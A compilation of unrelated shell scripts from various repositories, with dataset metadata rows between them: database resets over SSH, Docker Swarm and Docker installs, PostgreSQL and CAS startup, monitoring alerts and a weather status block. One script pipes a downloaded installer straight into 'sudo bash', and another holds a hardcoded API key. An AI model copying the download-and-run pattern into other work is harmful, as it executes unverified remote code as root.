mysql -h${MYSQL_HOST30} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} "hoomxb"${i} -e "source /scripts/init.txt"
sleep 5
ssh -l hsadmin 192.168.1.${i} -C "source /etc/profile && /./scripts/start_and_init_all.sh"
done
else
echo "192.168.1.${db}"
ssh -l hsadmin 192.168.1.${db} -C "source /etc/profile && /./scripts/kill_all.sh"
sleep 5
echo "hoomxb${db}"
mysql -h${MYSQL_HOST30} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} "hoomxb"${db} -e "source /scripts/sql.txt"
mysql -h${MYSQL_HOST30} -P${PORT} -u${MYSQL_USER} -p${MYSQL_PASSWORD} "hoomxb"${db} -e "source /scripts/init.txt"
sleep 5
ssh -l hsadmin 192.168.1.${db} -C "source /etc/profile && /./scripts/start_and_init_all.sh"
fi
;;
*)
echo "please input dababase_host and database_name!"
esac
| true
|
d97bc95c2973647a624aef7f285b0660e5d8d1e2
|
Shell
|
ciaranmcnulty/octopi
|
/power_switch.sh
|
UTF-8
| 275
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/bash
URL="http://$POWER_HOST:$POWER_PORT/plugs/$POWER_DEVICEID"
case "$1" in
"on")
wget -qO - "$URL/on" > /dev/null
;;
"off")
wget -qO - "$URL/off" > /dev/null
;;
*)
wget -qO - "$URL" | grep '"relay_state":1' > /dev/null
exit $?
;;
esac
| true
|
358573d8f4cd6d9bea2e338df5bca398919580a4
|
Shell
|
TheStrix/dotfiles
|
/bin/startgui
|
UTF-8
| 402
| 2.78125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Start sddm service, if it exists.
if service --status-all | grep -Fq 'sddm'; then
sudo service sddm start
fi
# Start lightdm service, if it exists.
if service --status-all | grep -Fq 'lightdm'; then
sudo service lightdm start
fi
# Start gdm service, if it exists.
if service --status-all | grep -Fq 'gdm'; then
sudo service gdm start
fi
| true
|
f74cf0bb6dc91cee18e0aa19d5a849f2e4dbe346
|
Shell
|
SamJones1331/Personal-Project
|
/startup.sh
|
UTF-8
| 400
| 2.578125
| 3
|
[] |
no_license
|
sudo apt-get update
#curls the cript from a webpage and then passes it through bash
curl https://get.docker.com | sudo bash
sudo usermod -aG docker $(whoami)
echo "Preparing to log you out"
sleep 1
echo "Remember to log back in once the terminal closes"
sleep 1
echo "Logging you out in 3"
sleep 1
echo "Logging you out in 2"
sleep 1
echo "Logging you out in 1"
sleep 1
echo "Logging you out"
logout
| true
|
b1a0eb3d49ececb41e427f1dc7d439e5037973a1
|
Shell
|
sfazli96/CS166-Phase3
|
/lab6/lab5/startPostgreSQL.sh
|
UTF-8
| 458
| 3.328125
| 3
|
[] |
no_license
|
#! /bin/bash
folder=/tmp/$LOGNAME
echo folder
#Clear Folder
rm -rf $folder
#Initialize folders
mkdir $folder
cd $folder
mkdir -p test/data
mkdir sockets
#Initialize the Database
export PGDATA=/tmp/$LOGNAME/test/data
sleep 1
#Initialize DB
initdb
sleep 1
#Starting Database
export PGPORT=5432
pg_ctl -o "-c unix_socket_directories=/tmp/$LOGNAME/sockets" -D $PGDATA -l /tmp/$LOGNAME/logfile start
sleep 1
#Checking of Database is running
pg_ctl status
| true
|
aa1b7532b4aed8b5eed0b673f8cdb89d2e0fad2f
|
Shell
|
geta6/dotfiles
|
/bin/setup-os
|
UTF-8
| 2,628
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/zsh
set -eu
BASE_DIR=$(dirname $(cd $(dirname $0); pwd))
if [[ "$OSTYPE" == "darwin"* ]]; then
#==============================#
echo "--> setup macOS settings"
#==============================#
[[ ! -d ~/Developer ]] && mkdir ~/Developer
[[ ! -d ~/Sites ]] && mkdir ~/Sites
cp -f ${BASE_DIR}/lib/com.apple.dock.plist ~/Library/Preferences/com.apple.dock.plist
killall Dock
cp -f ${BASE_DIR}/lib/com.apple.finder.plist ~/Library/Preferences/com.apple.finder.plist
killall Finder
if [[ -x `which plutil` ]]; then
if [[ -z "$(plutil -extract 'Default Window Settings' xml1 ~/Library/Preferences/com.apple.Terminal.plist -o - | grep Dracula)" ]]; then
open ${BASE_DIR}/lib/Dracula.terminal
fi
fi
#==============================#
echo "--> setup homebrew"
#==============================#
if [[ ! -x "`which brew`" ]]; then
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
eval "$(/opt/homebrew/bin/brew shellenv)"
fi
brew tap homebrew/cask-fonts
brew install \
binutils \
coreutils \
diffutils \
direnv \
ffmpeg \
findutils \
gifsicle \
git \
grep \
handbrake \
htop \
hub \
imagemagick \
mas \
moreutils \
neovim \
readline \
redis \
the_silver_searcher \
tig \
tmux \
unar \
yarn \
z
brew install --cask \
ankerwork \
appcleaner \
authy \
discord \
figma \
fliqlo \
font-hack-nerd-font \
google-chrome \
gyazo \
launchbar \
ngrok \
notion \
rectangle-pro \
skitch \
slack \
spotify \
the-unarchiver \
transmit \
visual-studio-code \
webcatalog
#==============================#
echo "--> setup AppStore"
#==============================#
mas install \
955848755 $(: 'Theine' \ )\
549083868 $(: 'Display Menu' \ )\
1532419400 $(: 'MeetingBar' \ )\
539883307 $(: 'LINE' \ )\
1352778147 $(: 'Bitwarden' \ )\
409183694 $(: 'Keynote' \ )\
409201541 $(: 'Pages' \ )\
409203825 $(: 'Numbers' \ )\
497799835 $(: 'Xcode' \ )
else if [[ "$OSTYPE" == "linux-gnu" ]]; then
#==============================#
echo "--> setup linux settings"
#==============================#
curl -sS https://dl.yarnpkg.com/debian/pubkey.gpg | sudo apt-key add -
echo "deb https://dl.yarnpkg.com/debian/ stable main" | sudo tee /etc/apt/sources.list.d/yarn.list
sudo apt install \
direnv \
hub \
htop \
neovim \
tig \
tmux \
yarn
else
echo 'Not compatible'
exit 1
fi
| true
|
060994f607273680985db30bc0f627a4cad2bf63
|
Shell
|
Jacquimo/cs352-projects
|
/project1/p1_tests_updated/tests.sh
|
UTF-8
| 620
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/bash
PATH=./tests/
FILES=./tests/*
BFILES=./tests2/*
ERROR="Syntax error"
echo -e "\033[1;4mTesting valid syntaxes:\033[0m"
for f in $FILES
do
echo "Running $f:"
OUTPUT=`./parser $f`
if [[ $OUTPUT =~ $ERROR ]]; then
echo -e "\033[1;31mTest Failed\033[0m"
echo "$OUTPUT"
else
echo -e "\033[1;32mTest Passed\033[0m"
fi
done
echo -e "\033[1;4mTesting for syntax error catching:\033[0m"
for f in $BFILES
do
echo "Running $f:"
OUTPUT=`./parser $f`
if [[ $OUTPUT =~ $ERROR ]]; then
echo -e "\033[1;32mTest Passed\033[0m"
else
echo -e "\033[1;31mTest Failed\033[0m"
echo "$OUTPUT"
fi
done
| true
|
658a4d6c4db2fb13b612e33f8a3652fac94b7ef6
|
Shell
|
robin-vip/shell_scripts
|
/shell_scripts/remote_copy_files.sh
|
UTF-8
| 1,491
| 3.734375
| 4
|
[] |
no_license
|
#!/bin/sh
# Function: Remote copy files via scp tools
# Author: Ward write at 07/24/2014
# Version: v1.00(inital)
echo -e "##################################################################################"
echo -e "##################################################################################"
echo -e "# Remote copy files tools #"
echo -e "# Versison: v1.00 07/24/2014 #"
echo -e "##################################################################################"
echo -e
quit=n
while [ "$quit" != "y" ]
do
read -ep " Please input target IP address(or hostname):" target_ip
ping -c 4 $target_ip > /dev/null
if test $? -ne 0; then
echo -e " Target's IP or hostname is error"
else
quit=y
fi
done
read -ep " Please input target machine's username:" username
read -ep " Please input source files path:" source_path
read -t 60 -ep " Please input files store path:" local_path
if [ "$local_path" == "" ]; then
local_path=./
fi
quit=n
while [ "$quit" != "y" ]
do
quit=y
read -ep " Please input copy's direction("to" or "from"):" direction
case "$direction" in
"to")
scp -rv $local_path $username@$target_ip:$source_path
;;
"from")
scp -rv $username@$target_ip:$source_path $local_path
;;
*)
echo -e "Sorry, choice not recognized"
quit=n
esac
done
| true
|
921e25dec71fe141e37578288b3ac2df6c4612c4
|
Shell
|
cncf/devstats
|
/util_sh/current_company_repos.sh
|
UTF-8
| 423
| 3
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
if ( [ -z "$1" ] || [ -z "$2" ] || [ -z "$3" ] || [ -z "$4" ] )
then
echo "$0: required DB name, event types, company name(s) and CSV file output, for example allprj \"'PushEvent', 'IssuesEvent'\" \"'ZTE', 'ZTE Corporation'\" output.csv"
exit 1
fi
GHA2DB_LOCAL=1 GHA2DB_SKIPTIME=1 GHA2DB_SKIPLOG=1 GHA2DB_CSVOUT="$4" PG_DB="$1" runq ./util_sql/company_repo_names.sql {{companies}} "$3" {{event_types}} "$2"
| true
|
c016c361c52dff7e44a4505142e2cadb556ab55d
|
Shell
|
SKA-ScienceDataProcessor/integration-prototype
|
/sip/tango_control/flask_master/util/mkstate
|
UTF-8
| 554
| 3.96875
| 4
|
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/bash
# Command line utility to create a new SDP State.
# Uses jq.
myname=${0##*/}
while getopts cds10?h name
do
case $name in
c) jqOpt="-cM" ;;
d) state=disable ;;
s) state=standby ;;
0) state=off ;;
1) state=on ;;
\?|h) printf "Usage: %s: -0 | -1 | -s | -d \n" $myname
printf " for off, on, standby and disable respectively\n"
printf " (default on)\n"
printf " Use -c to compact output.\n"
exit 2;;
esac
done
jq ${jqOpt} -n --arg state ${state:-on} '{"value":$state}'
| true
|
8ae3c88af0f684e7295a496ed2bd8cae2abec683
|
Shell
|
rekirt/shell
|
/bookdemo/chapter16/test8.sh
|
UTF-8
| 232
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
# 全局变量
# 局部变量
# local 全局变量可以把全局变量私有化,转换为局部变量
function db1 {
value=$[ $value * 2 ]
}
read -p "Enter a value:" value
db1
echo "the new value is $value"
| true
|
3dff9c26ac6435a8a0aa92457a618e58a9f08237
|
Shell
|
rockstar-project/continuous-delivery
|
/continuous-deployment/swarm/vb/setup.sh
|
UTF-8
| 1,903
| 2.984375
| 3
|
[] |
no_license
|
#!/bin/bash
STACK_NAME=$1
SWARM_PORT=2377
# Create the docker swarm manager node first.
docker-machine create --driver virtualbox vb-${STACK_NAME}-swarm-manager
# Get the IP address of the manager node.
SWARM_MANAGER_IP=$(docker-machine ip vb-${STACK_NAME}-swarm-manager)
# Create the three worker nodes.
docker-machine create --driver virtualbox vb-${STACK_NAME}-swarm-worker1
docker-machine create --driver virtualbox vb-${STACK_NAME}-swarm-worker2
docker-machine create --driver virtualbox vb-${STACK_NAME}-swarm-worker3
# Get the IP address of the worker nodes.
SWARM_WORKER1_IP=$(docker-machine ip vb-${STACK_NAME}-swarm-worker1)
SWARM_WORKER2_IP=$(docker-machine ip vb-${STACK_NAME}-swarm-worker2)
SWARM_WORKER3_IP=$(docker-machine ip vb-${STACK_NAME}-swarm-worker3)
# Point your docker client to the swarm manager.
eval $(docker-machine env vb-${STACK_NAME}-swarm-manager)
# Initialize Swarm mode.
docker swarm init --advertise-addr ${SWARM_MANAGER_IP} --listen-addr ${SWARM_MANAGER_IP}:${SWARM_PORT}
export TOKEN=$(docker swarm join-token -q worker)
# Point your docker client to the swarm worker1
eval $(docker-machine env vb-${STACK_NAME}-swarm-worker1)
docker swarm join --token $TOKEN --listen-addr ${SWARM_WORKER1_IP}:${SWARM_PORT} ${SWARM_MANAGER_IP}:${SWARM_PORT}
# Point your docker client to the swarm worker2
eval $(docker-machine env vb-${STACK_NAME}-swarm-worker2)
docker swarm join --token $TOKEN --listen-addr ${SWARM_WORKER2_IP}:${SWARM_PORT} ${SWARM_MANAGER_IP}:${SWARM_PORT}
# Point your docker client to the swarm worker3
eval $(docker-machine env vb-${STACK_NAME}-swarm-worker3)
docker swarm join --token $TOKEN --listen-addr ${SWARM_WORKER3_IP}:${SWARM_PORT} ${SWARM_MANAGER_IP}:${SWARM_PORT}
# Verify the cluster.
eval $(docker-machine env vb-${STACK_NAME}-swarm-manager)
docker node ls
docker node update --label-add type=gateway vb-${STACK_NAME}-swarm-manager
| true
|
bf21e70894c85fe4c6b456696c7e358ec5bef39e
|
Shell
|
cbosdo/my-media-center
|
/bin/vlc-wrapper
|
UTF-8
| 296
| 2.9375
| 3
|
[] |
no_license
|
#!/bin/sh
set -x
args=
url=$1
case "$url" in
cdda://*)
track=$(echo "$url" | sed 's;cdda://local/0*\([0-9]\+\).cdda;\1;')
args="--cdda-track $track"
url="cdda://"
;;
*)
exit 1
;;
esac
/usr/bin/cvlc --extraintf=rc --rc-host localhost:4321 --play-and-exit $args $url
| true
|
6dee36e208a5085ae251cae538ce326be72e58a8
|
Shell
|
dxw/rails-template
|
/script/all/process-script-args
|
UTF-8
| 416
| 3.578125
| 4
|
[] |
no_license
|
#!/bin/sh
# Source this in a script to process standard arguments for it.
set -e
echo "==> Loading command line options..."
DOCKER=${PREFER_DOCKER_FOR_DXW_RAILS:-0}
for arg in "$@"
do
case $arg in
--docker)
DOCKER=1
;;
--no-docker)
# shellcheck disable=SC2034
DOCKER=0
;;
*)
# Stop processing arguments so we pass them on
break
;;
esac
shift
done
| true
|
e2f87e1b916fdd5be1d6eb61622f153aea1dca6b
|
Shell
|
yemin7/cis
|
/sce/etc_group_chk.sh
|
UTF-8
| 905
| 4
| 4
|
[] |
no_license
|
#!/usr/bin/env sh
# CIS-CAT Script Check Engine
#
# Name Date Description
# -------------------------------------------------------------------
# E. Pinnell 07/15/20 Check existence of /etc/passwd groups in /etc/group
#
passing=""
output=""
EPG=""
EGG=""
EPG=$(cut -d: -f4 /etc/passwd | uniq)
EGG=$(cut -d: -f3 /etc/group | uniq)
for group in $EPG; do
# if ! grep -Eq "^$group$" <<< "$EGG"; then
if [ -z "$(echo "$EGG" | grep -E "(^|\s)$group\b")" ]; then
[ -n "$output" ] && output="$output $group" || output=$group
fi
done
[ -z "$output" ] && passing=true
# If the test passes, we pass
if [ "$passing" = true ] ; then
echo "All groups in /etc/passwd exist in /etc/group"
exit "${XCCDF_RESULT_PASS:-101}"
else
# print the reason why we are failing
echo "The group(s) \"$output\" exist in /etc/passwd but don't exist in /etc/group"
exit "${XCCDF_RESULT_FAIL:-102}"
fi
| true
|
76522ddcbaeef9337f191a89b30b7a7c8fd0fb62
|
Shell
|
ucarion/wikiracer
|
/integration_test.sh
|
UTF-8
| 1,401
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
go get ./wikiracer
go install ./wikiracer
bold=$(tput bold)
red=$(tput setaf 1)
reset=$(tput sgr0)
assert_output_equals() {
if [[ "$1" == "$2" ]]; then
echo "${bold}Assertion passed: output did equal: ${2}${reset}"
else
echo "${bold}${red}Assertion failed: output did not equal: ${2}${reset}"
exit 1
fi
}
# Test output when one of the articles is a dead-end
assert_output_equals \
"$(wikiracer find "Mike Tyson" "User:Ucarion" 2>/dev/null)" \
"No path found."
assert_output_equals \
"$(wikiracer find "Mike Tyson" "User:Ucarion" --format=json 2>/dev/null)" \
"null"
# Test trivial zero-step path
assert_output_equals \
"$(wikiracer find "Mike Tyson" "Mike Tyson" 2>/dev/null)" \
"Mike Tyson"
assert_output_equals \
"$(wikiracer find "Mike Tyson" "Mike Tyson" --format=json 2>/dev/null)" \
"[\"Mike Tyson\"]"
# TODO Test one-step paths? I haven't found a reliable real-world way to produce
# them.
# Test two-step path
assert_output_equals \
"$(wikiracer find "Kevin Bacon" "Paul Erdős" 2>/dev/null)" \
"Kevin Bacon -> Erdős number -> Paul Erdős"
assert_output_equals \
"$(wikiracer find "Kevin Bacon" "Paul Erdős" --format=json 2>/dev/null)" \
"[\"Kevin Bacon\",\"Erdős number\",\"Paul Erdős\"]"
# Test title normalization and URLs
assert_output_equals \
"$(wikiracer find "en.wikipedia.org/wiki/Albert_Einstein" "albert Einstein" 2>/dev/null)" \
"Albert Einstein"
| true
|
8ca43c4d06ec16ff40af9c2df923f3c53410d1ea
|
Shell
|
ZbZn905888/redisson
|
/create_orgs_repo.sh
|
UTF-8
| 423
| 2.65625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
USER_NAME="rollenholt"
ORGS_NAME="rollenholt-SourceReading"
PROJECT_NAME="redisson"
PROJECT_DESCRIPTION="redisson 源码阅读"
git init
git add .
git commit -m 'first commit'
curl -u $USER_NAME https://api.github.com/orgs/"$ORGS_NAME"/repos -d "{\"name\":\"$PROJECT_NAME\", \"description\": \"$PROJECT_DESCRIPTION\"}"
git remote add origin git@github.com:$ORGS_NAME/"$PROJECT_NAME".git
git push -u origin master
| true
|
a9566f6d1bfd36698a3b0259af5181b5a579cdf1
|
Shell
|
amirkarimi/cas
|
/ci/tests/webapp/validate-embedded-webapp.sh
|
UTF-8
| 2,809
| 3.78125
| 4
|
[
"LicenseRef-scancode-free-unknown",
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
#!/bin/bash
gradle="./gradlew "
gradleBuild=""
gradleBuildOptions="--build-cache --configure-on-demand --no-daemon "
webAppServerType="$1"
echo -e "***********************************************"
echo -e "Gradle build started at `date` for web application server ${webAppServerType}"
echo -e "***********************************************"
gradleBuild="$gradleBuild :webapp:cas-server-webapp-${webAppServerType}:build -x check -x test -x javadoc -DskipNestedConfigMetadataGen=true -DskipGradleLint=true "
if [[ "${TRAVIS_COMMIT_MESSAGE}" == *"[show streams]"* ]]; then
gradleBuild="$gradleBuild -DshowStandardStreams=true "
fi
if [[ "${TRAVIS_COMMIT_MESSAGE}" == *"[rerun tasks]"* ]]; then
gradleBuild="$gradleBuild --rerun-tasks "
fi
if [[ "${TRAVIS_COMMIT_MESSAGE}" == *"[refresh dependencies]"* ]]; then
gradleBuild="$gradleBuild --refresh-dependencies "
fi
if [ -z "$gradleBuild" ]; then
echo "Gradle build will be ignored since no commands are specified to run."
else
tasks="$gradle $gradleBuildOptions $gradleBuild"
echo -e "***************************************************************************************"
echo $tasks
echo -e "***************************************************************************************"
eval $tasks
retVal=$?
echo -e "***************************************************************************************"
echo -e "Gradle build finished at `date` with exit code $retVal"
echo -e "***************************************************************************************"
if [ $retVal == 0 ]; then
echo "Gradle build finished successfully."
echo "Preparing CAS web application WAR artifact..."
mv webapp/cas-server-webapp-"${webAppServerType}"/build/libs/cas-server-webapp-"${webAppServerType}"-*.war webapp/cas-server-webapp-"${webAppServerType}"/build/libs/cas.war
echo "Launching CAS web application ${webAppServerType} server..."
java -jar webapp/cas-server-webapp-"${webAppServerType}"/build/libs/cas.war --server.ssl.enabled=false --server.port=8080 &> /dev/null &
pid=$!
echo "Launched CAS with pid ${pid}. Waiting for CAS server to come online..."
sleep 60
cmd=`curl --connect-timeout 60 -s -o /dev/null -I -w "%{http_code}" http://localhost:8080/cas/login`
kill -9 "${pid}"
echo "CAS server is responding with HTTP status code ${cmd}."
if [ "$cmd" == 200 ]; then
echo "CAS server with ${webAppServerType} is successfully up and running."
exit 0
else
echo "CAS server with ${webAppServerType} failed to start successfully."
exit 1
fi
else
echo "Gradle build did NOT finish successfully."
exit $retVal
fi
fi
| true
|
b5dfd607d0ce4a70d6dedb0e7306990b3638dd5b
|
Shell
|
StephenBrown2/dotfiles
|
/tag-i3blocks/config/i3blocks/blocks/weather
|
UTF-8
| 2,983
| 2.859375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Based on http://openweathermap.org/current
API_KEY="8a16c18406dea239a9a5cbd13eac8707"
MURICA=true
URGENT_LOWER=273
URGENT_HIGHER=310
UNITS="kelvin"
SYMBOL="K"
if [[ "${MURICA}" = true ]]; then
URGENT_LOWER=32
URGENT_HIGHER=100
UNITS="imperial"
SYMBOL="℉"
SYMBOL="°F"
elif [[ "${MURICA}" = false ]]; then
URGENT_LOWER=0
URGENT_HIGHER=37
SYMBOL="℃"
SYMBOL="°C"
UNITS="metric"
fi
ICON_SUNNY=""
ICON_CLOUDY=""
ICON_RAINY=""
ICON_STORM=""
ICON_SNOW=""
# Check on http://openweathermap.org/find
BASE_URL="http://api.openweathermap.org/data/2.5/weather?appid=${API_KEY}&units=${UNITS}"
INSTANCE="${BLOCK_INSTANCE:-4726206}"
if [[ "${INSTANCE}" =~ ^[0-9]{7}$ ]]; then
CITY_ID=${INSTANCE}
WEATHER_URL="${BASE_URL}&id=${CITY_ID}"
elif [[ "${INSTANCE}" =~ ^[0-9]{5}$ ]]; then
CITY_ZIP=${INSTANCE}
WEATHER_URL="${BASE_URL}&zip=${CITY_ZIP}"
elif [[ "${INSTANCE}" =~ ^([0-9]{5}),([a-zA-Z]{2})$ ]]; then
CITY_ZIP=${BASH_REMATCH[1]}
COUNTRY_CODE=${BASH_REMATCH[2]}
WEATHER_URL="${BASE_URL}&zip=${CITY_ZIP},${COUNTRY_CODE}"
elif [[ "${INSTANCE}" =~ ^([0-9.-]+),([0-9.-]+)$ ]]; then
LAT=${BASH_REMATCH[1]}
LON=${BASH_REMATCH[2]}
WEATHER_URL="${BASE_URL}&lat=${LAT}&lon=${LON}"
elif [[ "${INSTANCE}" =~ ^([a-zA-Z ]+),([a-zA-Z]{2})$ ]]; then
CITY_NAME=$( echo "${BASH_REMATCH[1]}" | sed 's/ /%20/g')
COUNTRY_CODE=${BASH_REMATCH[2]}
WEATHER_URL="${BASE_URL}&q=${CITY_NAME},${COUNTRY_CODE}"
else
echo "Didn't match anything."
echo "This should never happen."
exit 22
fi
WEATHER_INFO=$(curl -s "${WEATHER_URL}")
ERROR_CODE=$(echo "${WEATHER_INFO}" | jshon -e cod -u 2>/dev/null)
ERROR_MESSAGE=$(echo "${WEATHER_INFO}" | jshon -e message -u 2>/dev/null)
WEATHER_MAIN=$(echo "${WEATHER_INFO}" | jshon -e weather -a -e main -u)
WEATHER_DESC=$(echo "${WEATHER_INFO}" | jshon -e weather -a -e description -u)
WEATHER_TEMP=$(echo "${WEATHER_INFO}" | jshon -e main -e temp | awk '{printf "%.2f", $1}')
WEATHER_ICON=$(echo "${WEATHER_INFO}" | jshon -e weather -a icon)
ICON_URL="http://openweathermap.org/img/w/${WEATHER_ICON}.png"
if [[ "${WEATHER_MAIN}" = *Snow* ]]; then
ICON="${ICON_SNOW}"
elif [[ "${WEATHER_MAIN}" = *Rain* ]] || [[ "${WEATHER_MAIN}" = *Drizzle* ]]; then
ICON="${ICON_RAINY}"
elif [[ "${WEATHER_MAIN}" = *Cloud* ]]; then
ICON="${ICON_CLOUDY}"
elif [[ "${WEATHER_MAIN}" = *Clear* ]]; then
ICON="${ICON_SUNNY}"
elif [[ "${WEATHER_MAIN}" = *Extreme* ]]; then
URGENT_LOWER=0
URGENT_HIGHER=0
ICON=""
elif [[ -n ${ERROR_CODE} ]]; then
WEATHER_DESC=${ERROR_MESSAGE}
WEATHER_TEMP="Err: ${ERROR_CODE}"
SYMBOL=""
ICON=""
else
ICON=""
fi
echo "${ICON} ${WEATHER_DESC} ${WEATHER_TEMP}${SYMBOL}"
echo "${ICON} ${WEATHER_TEMP}${SYMBOL}"
echo ""
if [[ -n ${ERROR_CODE} ]] || [[ "${URGENT_LOWER}" -eq "${URGENT_HIGHER}" ]] || [[ "${WEATHER_TEMP%.*}" -lt "${URGENT_LOWER}" ]] || [[ "${WEATHER_TEMP%.*}" -gt "${URGENT_HIGHER}" ]]; then
exit 33
fi
| true
|
f0379b94c26edf3afa6c45d75aadd88f3ce0b9cc
|
Shell
|
GrowSense/Index
|
/test-monitor.sh
|
UTF-8
| 366
| 2.578125
| 3
|
[] |
no_license
|
MONITOR_LABEL="MyMonitor"
MONITOR_DEVICE_NAME="mymonitor"
MONITOR_PORT="ttyUSB0"
echo "----------" && \
echo "Testing monitor scripts" && \
echo "----------" && \
sh clean.sh && \
sh remove-garden-devices.sh && \
echo "" && \
echo "Creating garden monitor services" && \
echo "" && \
sh create-garden-monitor.sh $MONITOR_LABEL $MONITOR_DEVICE_NAME $MONITOR_PORT
| true
|
0040b0ac1d52febb55d3667c53ae18b231a8588c
|
Shell
|
liujiamingustc/phd
|
/docker/water/delft3d/docker-hub/DOCKER_CFD-deltares-delft3d-master/make.sh
|
UTF-8
| 1,793
| 3.765625
| 4
|
[
"LicenseRef-scancode-public-domain",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -e
function print_help {
printf "Available Commands:\n";
awk -v sq="'" '/^function run_([a-zA-Z0-9-]*)\s*/ {print "-e " sq NR "p" sq " -e " sq NR-1 "p" sq }' make.sh \
| while read line; do eval "sed -n $line make.sh"; done \
| paste -d"|" - - \
| sed -e 's/^/ /' -e 's/function run_//' -e 's/#//' -e 's/{/ /' \
| awk -F '|' '{ print " " $2 "\t" $1}' \
| expand -t 30
}
function run_checkout-6906 { #checkout the Delft3D version tagged as 6906
svn co https://svn.oss.deltares.nl/repos/delft3d/tags/6906/
}
function run_build-6906 { #build the Delft3D Docker container for 6906
if [ ! -d "6906" ]; then echo "please checkout the source code first"; exit 1; fi;
docker build -t quay.io/nerdalize/deltares-delft3d:6906 -f 6906.Dockerfile .
}
function run_checkout-6906-extwithr { #checkout the Delft3D version with R and extended boundary
svn co https://svn.oss.deltares.nl/repos/delft3d/tags/6906/ 6906-extwithr
#TODO: automate boundary changes
}
function run_build-6906-extwithr { #build the Delft3D Docker container with R and extended boundary
if [ ! -d "6906-extwithr" ]; then echo "please checkout the source code first"; exit 1; fi;
docker build -t quay.io/nerdalize/deltares-delft3d:6906-extwithr -f 6906-extwithr.Dockerfile .
}
function run_push-6906-extwithr { #push the Delft3D Docker container with R and extended boundary
if [ ! -d "6906-extwithr" ]; then echo "please checkout the source code first"; exit 1; fi;
docker push quay.io/nerdalize/deltares-delft3d:6906-extwithr
}
case $1 in
"checkout-6906") run_checkout-6906 ;;
"build-6906") run_build-6906 ;;
"checkout-6906-extwithr") run_checkout-6906-extwithr ;;
"build-6906-extwithr") run_build-6906-extwithr ;;
"push-6906-extwithr") run_push-6906-extwithr ;;
*) print_help ;;
esac
| true
|
141b45ce56e298b47341c5c8cd06447292cb62e5
|
Shell
|
XuQiao/HI
|
/CMSSW_4_4_7/src/flowAnalysis/SkimTrack/test/pbs/submitall.sh
|
UTF-8
| 412
| 2.84375
| 3
|
[] |
no_license
|
#!/bin/bash
nfiles=`cat filelistAll.dat | wc -l`
nfilesperjob=20
njobs=`echo "$nfiles/$nfilesperjob" | bc`
echo "split into $(($njobs+1)) jobs, $nfilesperjob files per job"
for i in $( seq 0 $njobs );do
#if [[ $i == 0 ]];then
begin=`echo "$i*$nfilesperjob" | bc`
end=`echo "($i+1)*$nfilesperjob" | bc`
if [[ $i == $njobs ]];then
end=$nfiles
fi
qsub -v I=$i,BEGIN=$begin,END=$end -N job$i -z jobsub.pbs
#fi
done
| true
|
8b70ceca2ef3a38f2dfdb6e092a86704c404c163
|
Shell
|
zorille/php_depot
|
/monitoring/hobbit/alert.sh
|
UTF-8
| 1,050
| 3.375
| 3
|
[] |
no_license
|
#!/usr/local/bin/bash
DOSSIER_CONFIG=/home/hobbit/server/etc/config
function envoi_mail
{
INFO=$1
COLOR=$2
#echo "$BBALPHAMSG" | ${MAIL} "Hobbit [${ACKCODE}] ${BBHOSTSVC} ${INFO} (${COLOR})" tech-exploitation@client.com
echo "$BBALPHAMSG" | ${MAIL} "Hobbit [${ACKCODE}] ${BBHOSTSVC} ${INFO} (${COLOR})" dv@client.com
return 0
}
function envoi_sms
{
# envoi d'un sms via nagios
echo "2|${INFO} `${DATE} +%H:%M:%S` : ${BBHOSTSVC} est en ERREUR" > ${DOSSIER_CONFIG}/nagios_etat.log
return 0
}
#env >${DOSSIER_CONFIG}/tempo.txt
if [ "${RECOVERED}" == "1" ]
then
envoi_mail RECOVERED GREEN
echo "0|Tout est OK dans Hobbit" > ${DOSSIER_CONFIG}/nagios_etat.log
exit 0
fi
for ligne in `cat ${DOSSIER_CONFIG}/${BBHOSTNAME}_config |egrep -v "^#"`
do
MONITEUR=`echo ${ligne} | cut -d : -f 3`
if [ "${MONITEUR}" == "${BBSVCNAME}" ]
then
NIVEAU=`echo ${ligne} | cut -d : -f 2`
case ${NIVEAU} in
1)
envoi_mail CRITICAL RED
envoi_sms
;;
2)
envoi_mail CRITICAL RED
;;
3)
envoi_mail WARNING YELLOW
;;
*)
echo erreur
;;
esac
fi
done
| true
|
e16d5574193dbd9c39abdc0d1fec84f4812b1d2f
|
Shell
|
agilebeat-inc/maprover--data-amass
|
/pkginstall.sh
|
UTF-8
| 792
| 4
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
if ! [[ -d 'pipe1' ]]; then
>&2 echo "This script must be run from the main repo directory!"
exit 1
fi
# remove any existing 'dist' files in case there are old versions:
if [[ -d 'dist' ]]; then
rm -r ./dist
fi
# create the blob that pip can install
res=$(python3 setup.py sdist)
if [[ ${res} -ne 0 ]]; then
>&2 echo "Error code ${res} in setup.py run!"
exit ${res}
fi
# if the package is currently installed, we don't want to re-install dependencies
# but we do want to re-install if this command has been run
pip3 show pipe1 > /dev/null
if [[ $? -eq 0 ]]; then
echo "Re-installing package 'pipe1'!"
pip3 install ./dist/*.gz --no-deps --force-reinstall
else
echo "Installing pipe1 for the first time!"
pip3 install ./dist/*.gz
fi
| true
|
953408cbc65c919927d4b50edab2137229a293f9
|
Shell
|
mujingyuan/ansible_resource
|
/scripts/create_mongodb_replicas.sh
|
UTF-8
| 625
| 2.78125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
ansible_resource_dir=/data/www/ansible_handler/ansible_resource
environment=$1
project=$2
mongodb_master_target=$3
mongodb_replicas_target=$4
inventory_file=${ansible_resource_dir}/data/inventory/${environment}/${project}
playbook_file=${ansible_resource_dir}/playbooks/deploy_mongodb.yml
key_file=${ansible_resource_dir}/data/common/keys/${project}_${environment}
